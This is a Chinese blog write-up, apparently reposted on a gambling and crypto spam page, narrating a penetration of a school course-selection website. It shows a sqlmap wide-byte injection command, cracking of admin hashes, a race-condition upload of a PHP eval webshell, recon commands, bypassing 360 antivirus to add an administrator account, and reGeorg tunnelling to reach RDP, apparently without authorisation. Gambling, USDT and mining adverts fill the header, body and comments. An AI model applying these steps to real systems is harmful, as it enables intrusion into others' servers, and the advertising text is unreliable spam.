欢迎进入Allbet官网。Allbet官网开放Allbet登录网址、Allbet开户、Allbet代理开户、Allbet电脑客户端、Allbet手机版下载等业务。

首页科技正文

usdt支付接口(www.caibao.it):记一次简朴渗透

admin2021-06-1942安全技术众测渗透

IPFS挖矿

IPFS官网(www.FLaCoin.vip)是Filecoin致力服务于使用Filecoin存储和检索数据的官方权威平台。IPFS官网实时更新FlaCoin(FIL)行情、当前FlaCoin(FIL)矿池、FlaCoin(FIL)收益数据、各类FlaCoin(FIL)矿机出售信息。并开放FlaCoin(FIL)交易所、IPFS云矿机、IPFS矿机出售、租用、招商等业务。

前言

之前对渗透这方面的学习一直只是学到了Getshell为止,然则实在渗透可以说Getshell仅仅是一个劈头,接下去的另有远程毗邻,域渗透等领域,这次恰好渗透到了某网站,决议以该网站为例,看看能不能举行一次相对完整的渗透历程

SQL注入

该网站是某校某选课网站,首先先用扫描器扫描一下网站,运气很好,居然扫出了一个注入,一看,原来是个宽字节注入

简朴测了一下,发现并没有什么过滤,那就通例操作,用SQLmap跑一下

python2 sqlmap.py -u "http://xxx.xx.xx.xx/aaa/bbb.php?cid=118" --tamper=unmagicquotes

接下来即是爆库,爆表,爆列,爆值等通例操作。
获取Admin表中的账号密码,虽说密码是md5加密的了,然则去cmd5平台上一查,照样很利便的进入了后台

Getshell

接下来即是追求Getshell的时机了

注重到这里有个上传文件的地方,从源码中可以看到是Fckeditor编辑器
从网上搜索相关的破绽,首先先查看版本

发现是2.6.6版本的,遗憾的是只能找到2.6.6asp版本的洞,PHP版本的并不能找到相关的破绽,而用了几个EXP去试试运气也都碰钉子了,渗透原本到此就受阻
然则突然发现另有一个上传学生名单的接口

测试了一下,只有一个简朴的前端认证,而且用burpsuite一看,另有了惊喜的发现

文件不仅上传乐成了,而且还返回了响应的路径,当下便想到来连shell了,但当我想来连之时,却发现文件被删了,由文件路径内里有个temp,一下子就想到后端一定写了一个自动清空temp目录的函数,然则解决思绪也是很明确的,就是条件竞争嘛,通过多线程发包的方式,来实现一准时间内的文件接见
这里我将要发包的文件改为:

<?php file_put_contents('../success.php',"<?php phpinfo();@eval(\$_POST['a']); ?>"); ?>

只要我们能接见到它一次,这个程序就会自动在父目录内里写入一个shell,也就实现了跳出temp目录的写shell了。
用burpsuite的intruder模块不停发包,再接见我们上传的文件,便实现了乐成写shell的目的,如图,Getshell:

系统信息搜集

systeminfo查看系统相关信息

netstat -ano查看开放的端口

可以看到3389端口是打开的,也就是可以举行远程毗邻
whoami查看当前用户

,

FlaCoin矿机

IPFS官网(www.FLaCoin.vip)是Filecoin致力服务于使用Filecoin存储和检索数据的官方权威平台。IPFS官网实时更新FlaCoin(FIL)行情、当前FlaCoin(FIL)矿池、FlaCoin(FIL)收益数据、各类FlaCoin(FIL)矿机出售信息。并开放FlaCoin(FIL)交易所、IPFS云矿机、IPFS矿机出售、租用、招商等业务。

,

远程毗邻

可以看到是system权限,原本我以为大功告成,接下来就是确立治理员用户,举行远程毗邻之时,然则发现无论若何都无法把用户添加进治理员组
在网上查了许多资料,有人说是可能有杀毒软件。tasklist一看,果真有360
那么问题到这里就只有三条路了:
1. 杀掉360,看看能不能行使system的高权限杀掉360
2. 获得其他治理员账户的密码或者密码的hash值,行使其他治理员的账户举行登录
2. 绕过360确立一个治理员账号

我对这三种情形都举行了实验:

  • 方式1:我实验行使taskkill来杀掉360的历程,然则始终报错,网上的资料五花八门,有的说system权限可以用taskkill来关闭360,也有的说360的自动防御历程(ZhuDongFangYu.exe)是在系统Ring0层,纵然system权限也无法用taskkill来关掉,至少在这次渗透中,我渗透的机械,是没设施直接用taskkill来关掉360历程的,包罗网上所讲的sc delete方式在这台机子上也是行不通的(会被阻挡),至少现在看起来这条路堵死了
  • 方式2:当我上传Quarks PwDump.exe和种种软件时,无一破例都市被360阻挡,看起来这条路也堵死了
  • 方式3:方式3就是我们最后的希望了,从网上看到资料说system权限下可以用Windows API的方式来确立治理员账户,而这种方式360不会阻挡,详细可以参见这篇文章:
    【编程】确立用户,并添加至治理组
    然则对照蛋疼的一点是我电脑没有VS,编译不了这个文件,而宿友也都没有一小我私人安装的(事实他着实是太大了)
    幸亏我在github上找到了一个体人编译好的版本
    https://github.com/cckuailong/netuser
    运行了一下,乐成添加用户

    那么就只剩最后一步了,举行远程毗邻,然则当我想直接毗邻的时刻,发现居然连不上,用nmap扫了一下端口,发现3389没有开启,然则上面的netstat -ano显示3389是有开启的,那就只能说明3389端口是开在内网的,我们得举行一下内网穿透,把流量转发出来,使用reGeorg举行内网穿透。

将tunnel.nosocket.php上传至web目录(这里不能上传tunnel.php,php<5.3不能正常使用tunnel.php)
接见目的文件:

说明设置正常,关于reGeorg的使用可以去看这几篇文章
内网渗透--reGeorg+Proxifier
绕过360确立用户上岸内网3389实战纪录
最后,我们就能乐成的使用远程毗邻了,上了远程毗邻后,首先退出360所有防护,为接下来的进一步渗透做准备

在这里,还看到了天师的一篇文章,纪录了若何隐藏添加的后门,获益匪浅
windows渗透中后门用户的添加方式探讨
这次的渗透就先到这里,接下来的域渗透,就等以后有时间再来学习和钻研了。

写在后面

这是我第一次举行后Getshell的渗透,写的可能很烦琐而且很LOW,然则主要目的照样想让我自己记着这一此渗透学习到的知识,等以后有时间了再来继续举行下一步的域渗透

参考文章

一次windows2008的提权历程
Windows服务器SYSTEM权限Webshell无法添加3389账户情形突破总结
Windows渗透基础大全
内网渗透初识—信息网络
【编程】确立用户,并添加至治理组
绕过360确立用户上岸内网3389实战纪录
windows渗透中后门用户的添加方式探讨
Windows提权确立Administrator的影子账户

网友评论

2条评论
  • 2021-06-19 00:00:03

    足球贴士网免费足球贴士网(www.zq68.vip)是国内最权威的足球赛事报道、预测平台。免费提供赛事直播,免费足球贴士,免费足球推介,免费专家贴士,免费足球推荐,最专业的足球心水网。挺好看的,比较喜欢

最新评论

  • USDT交易所 05/23 说:

    Allbet电脑版下载欢迎进入Allbet电脑版下载(www.aLLbetgame.us),欧博官网是欧博集团的官方网站。欧博官网开放Allbet注册、Allbe代理、Allbet电脑客户端、Allbet手机版下载等业务。好文不用推广

  • USDT交易所 05/23 说:

    Allbet电脑版下载欢迎进入Allbet电脑版下载(www.aLLbetgame.us),欧博官网是欧博集团的官方网站。欧博官网开放Allbet注册、Allbe代理、Allbet电脑客户端、Allbet手机版下载等业务。好文不用推广

  • 逆熵科技 05/23 说:

    考虑到交通利便,两人乘坐了高铁,相邻而坐。第一次和向导出差,小丽安排得也算稳妥,向导还算满足,就想找个话题聊,“最近事情怎么样呢?”我就想发个言

  • USDT官网 05/23 说:

    USDT场外交易平台U交所(www.payusdt.vip)是使用TRC-20协议的Usdt官方交易所,开放USDT帐号注册、usdt小额交易、usdt线下现金交易、usdt实名不实名交易、usdt场外担保交易的平台。免费提供场外usdt承兑、低价usdt渠道、Usdt提币免手续费、Usdt交易免手续费。U交所开放usdt otc API接口、支付回调等接口。爱了爱了,抱走。

  • USDT法币交易 05/23 说:

    欧博亚洲电脑版下载欢迎进入欧博亚洲电脑版下载(www.aLLbetgame.us),欧博官网是欧博集团的官方网站。欧博官网开放Allbet注册、Allbe代理、Allbet电脑客户端、Allbet手机版下载等业务。读者小伙伴在哪里

  • 联博统计接口 05/22 说:

    ALLBET官网娱乐平台开户欢迎进入ALLBET官网娱乐平台开户,欧博官网是欧博集团的官方网站。欧博官网开放Allbet注册、Allbe代理、Allbet电脑客户端、Allbet手机版下载等业务。看得很心潮澎湃

  • usdt跑分 05/22 说:

    USDT场外交易U交所(www.payusdt.vip),全球頂尖的USDT場外擔保交易平臺看来挺好的

  • usdt法币交易平台 05/22 说:

    很强!